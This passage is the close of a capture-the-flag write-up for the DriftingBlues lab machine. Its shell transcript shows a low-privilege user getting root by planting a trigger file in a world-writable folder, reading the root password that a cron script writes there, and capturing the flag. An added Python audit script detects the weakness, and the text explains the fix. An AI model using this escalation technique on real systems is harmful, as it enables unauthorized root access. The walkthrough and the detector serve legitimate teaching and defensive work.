drwx---rwx  2 root root 4.0K May 19 03:04 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:04 fracturedocean
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 12K
drwx---rwx  2 root root 4.0K May 19 03:05 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:04 fracturedocean
-rw-r--r--  1 root root   29 May 19 03:05 rootcreds.txt
gill@driftingblues:/tmp$ cat /keyfolder/rootcreds.txt 
root creds

imjustdrifting31
gill@driftingblues:/tmp$ 
gill@driftingblues:/tmp$ su - root
Password: 
root@driftingblues:~# id
uid=0(root) gid=0(root) groups=0(root)
root@driftingblues:~# cd /root
root@driftingblues:~# ls -alh
total 20K
drwx------  2 root root 4.0K Mar  8  2021 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-------  1 root root   45 Mar  8  2021 .bash_history
-rwx------  1 root root  205 Feb 24  2021 key.sh
-r-x------  1 root root 1.8K Dec 17  2020 root.txt
root@driftingblues:~# cat root.txt 
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@driftingblues:~# cat key.sh 
#!/bin/bash

if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
        echo "root creds" >> /keyfolder/rootcreds.txt
        echo "" >> /keyfolder/rootcreds.txt
        echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
root@driftingblues:~# 
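The weakness key.sh illustrates is a root cron job that trusts the contents of a directory any user can write to (/keyfolder is drwx---rwx). The audit script below is an added example, not part of the machine or of the walkthrough: it extracts the absolute paths a scheduled script touches and reports those where a group- or world-writable directory lets an unprivileged user control what root reads or writes. It stages a throw-away copy of the relevant directories under a temp dir so it runs without root; KEY_SH, stage_demo_tree and the placeholder password are constructed.

```python
from __future__ import annotations
import os
import re
import stat
import tempfile

# Absolute paths in shell text: a "/" not preceded by a word character or dot, then path characters.
PATH_RE = re.compile(r"(?<![\w.])/[\w./-]+")

# Constructed stand-in for the target's /root/key.sh: same logic, placeholder secret,
# plus one extra path under /root so the report shows a safe path beside the bad ones.
KEY_SH = """#!/bin/bash
log=/root/key.log
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
        echo "ROOT_PASSWORD_PLACEHOLDER" >> /keyfolder/rootcreds.txt
fi
"""


def referenced_paths(script_text: str) -> set[str]:
    """Absolute paths a script touches (the shebang interpreter is skipped)."""
    paths: set[str] = set()
    for line in script_text.splitlines():
        if not line.startswith("#!"):
            paths.update(PATH_RE.findall(line))
    return paths


def writable_by_others(path: str) -> bool:
    """True when the path, or the nearest existing parent that would have to
    create it, is group- or world-writable: any local user can then plant,
    rename or replace what a privileged job reads or writes there."""
    probe = path
    while not os.path.exists(probe):
        probe = os.path.dirname(probe)
    mode = os.stat(probe).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script(script_text: str, root: str = "/") -> dict[str, bool]:
    """Map each referenced path to whether an unprivileged user can tamper with it.
    `root` re-bases the paths so the check can run against a staged copy of the tree."""
    return {p: writable_by_others(os.path.join(root, p.lstrip("/")))
            for p in sorted(referenced_paths(script_text))}


def stage_demo_tree() -> str:
    """Recreate the two directories that matter under a temp dir, with the target's
    modes: /keyfolder is drwx---rwx (0707), /root is drwx------ (0700)."""
    root = tempfile.mkdtemp()
    for name, mode in (("keyfolder", 0o707), ("root", 0o700)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)  # explicit chmod: mkdir's mode is masked by umask
    return root


def demo() -> dict[str, bool]:
    """Run the audit on the staged tree; both /keyfolder paths are flagged, /root/key.log is not."""
    return audit_script(KEY_SH, stage_demo_tree())


if __name__ == "__main__":
    for path, tamperable in demo().items():
        print(("[!] " if tamperable else "[ok] ") + path)
```

On a live host, run `audit_script(open("/root/key.sh").read())` as root against the real tree (the default `root="/"`); the fix for the finding is to keep anything a privileged job consumes in a root-owned directory with mode 0700 rather than in a directory other users can write to.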
posted @ 2023-05-19 16:21  Jason_huawen